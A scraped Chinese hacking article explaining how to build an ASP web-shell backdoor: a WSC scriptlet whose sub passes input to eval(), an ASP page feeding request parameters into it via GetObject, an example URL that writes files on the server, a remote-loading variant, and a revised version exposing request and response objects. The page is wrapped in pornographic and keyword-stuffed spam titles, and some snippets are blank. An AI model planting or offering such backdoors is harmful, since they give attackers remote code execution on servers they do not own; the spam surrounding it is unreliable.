成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

利用wsc來做一個asp后門及后續

安全 黑客攻防
利用wsc來做一個asp后門及后續……

ScriptCodingInfo.wsc代碼如下,該文件可以改成任意后綴:

以下是引用片段:







sub lcx(b)
eval(b)

end sub
]]>


backdoor.asp內容如下:

以下是引用片段:
<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>

調用方法如下:

以下是引用片段:
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意這里的a=只能是vbs的代碼,不可以接受像response、request之類的asp的東東。如果是2000服務器可以在backdoor.asp遠程調用ScriptCodingInfo.wsc,像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服務器中不可以。算一個思路,雞肋,誰有更好的辦法完善,能夠直接調用cs的asp木馬的c端就好了。
#p#

突然看到了lcx巨形牛頭人發了一個帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛頭人所說的,沒有加進request和response類很不爽。于是我作了一個簡單的修改。

ScriptCodingInfo.wsc 代碼

以下是引用片段:







sub lcx(b,a,c)
set response=c ’加入request和response進來。就可以直接調用了
set request=a ’修改 by:phpeval.cn
eval(b)
end sub
]]>


test.asp代碼:

<% 
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx b,request,response
%>

測試方法:

以下是引用片段:

不知道這是不是lcx巨形牛頭人所說的那個c端。我一直不太理解“能夠直接調用cs的asp木馬的c端就好了”lcx巨牛的這句話的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段:
wsc%23haiyangtop&c=phpeval

這樣好象更有誘惑性。

【編輯推薦】

  1. 4.1.7 使用SQLRootKit網頁數據庫后門控制案例
  2. 入侵Windows2000系統放置后門的方法
  3. Linux下的后門和日志工具
責任編輯:佚名 來源: 黑客風云
相關推薦

2011-12-20 10:02:01

ASP.NET

2015-07-03 11:27:30

程序員自己神器

2019-09-10 09:12:54

2017-06-30 15:18:24

對賬系統互聯網

2012-12-17 12:58:18

WebjQuery重構

2020-05-26 10:38:51

安全 黑客Windows

2018-01-04 16:04:35

圓環放大動畫

2021-12-17 10:06:42

鴻蒙HarmonyOS應用

2016-11-23 18:13:44

javascriptrxjsreactivex

2011-02-28 09:22:47

SQLite記賬簿

2017-06-19 08:30:35

大數據數據可視化報表

2014-04-29 10:50:16

池建強

2019-04-22 10:25:52

程序員技術職場

2021-12-01 07:02:55

Python 記錄器按鍵

2020-07-20 10:00:52

Python翻譯工具命令行

2018-06-08 16:18:43

Python微信聊天機器人

2009-09-15 09:23:35

初級linuxLinuxlinu操作系統x后門

2013-04-23 14:32:28

創業創業者Mark Suster

2012-04-10 16:26:46

2014-07-22 10:00:18

程序員
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美日韩久久精品 | 成人影院在线观看 | 国产日韩一区二区三免费高清 | 久草视频2 | 中文字幕一区二区在线观看 | 国产精品久久亚洲7777 | 天天射天天干 | 欧美激情一区二区 | 男人电影天堂 | 91色视频在线观看 | 精品二区视频 | 天天影视网天天综合色在线播放 | 中文字幕免费观看 | 亚洲综合色丁香婷婷六月图片 | 国产精品高清在线 | 99热都是精品 | 国产一区二区三区在线 | 日韩欧美三区 | 一级黄在线观看 | 精品三级在线观看 | 在线观看国产 | 日本小电影在线 | 精久久久久| 欧美日韩专区 | 99久久99| 成人午夜精品一区二区三区 | 国产亚洲精品美女久久久久久久久久 | 精品在线一区二区三区 | 午夜影院操 | 久久里面有精品 | 久久久久国产一区二区三区 | 久久精品国产一区二区三区 | 天天澡天天狠天天天做 | 夜夜骑天天干 | 久久久久久综合 | 欧美一区二区三区 | 一区二区三区国产 | 免费激情网站 | www.久久| 91社影院在线观看 | 国产一级电影网 |